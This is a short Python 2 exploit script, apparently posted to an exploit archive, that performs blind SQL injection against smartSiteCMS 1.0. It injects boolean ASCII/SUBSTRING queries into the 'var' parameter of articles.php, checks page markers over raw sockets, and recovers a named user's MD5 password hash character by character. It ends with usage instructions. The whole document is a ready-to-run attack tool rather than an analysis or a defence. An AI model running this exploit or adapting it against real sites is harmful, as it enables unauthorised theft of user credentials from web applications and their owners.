#!/usr/bin/python import sys import re from socket import * class exploit: def __init__(self,host,path,user): self.host=host self.path=path self.user=user self.reg=re.compile("<!-- END COMMENT FORM -->") def set_query(self,n,ch): self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2" self.query = self.query.replace(" ","%20") self.query = self.query.replace("'","%27") self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n" def check(self): sock=socket(AF_INET, SOCK_STREAM) sock.connect((self.host, 80)) sock.send(self.request) r="" t="-" while(t!=""): t=sock.recv(1024) r+=t match=self.reg.search(r) if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"): return 1 else: return 0 sock.close() print "////*****************************************\\\\\\\\" print "|||| smartSiteCMS 1.0 v1.0 ||||" print "|||| Blind SQL injection ||||" print "|||| ||||" print "|||| ~Author: certaindeath ||||" print "|||| ~Greetz: darkjoker ||||" print "\\\\\\\\*****************************************////\n" if(len(sys.argv) !=4 ): print "Usage: python xpl.py <host> <cms path> <user>" print "Example: python xpl.py localhost /cms admin" sys.exit(0) pwd="" xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3]) n=1 while(n<=32): t=0 xpl.set_query(n,str(t)) while (xpl.check()!=1): t+=1 xpl.set_query(n,str(hex(t))[-1]) pwd+=str(hex(t))[-1] n+=1 print "pass [md5]: ",pwd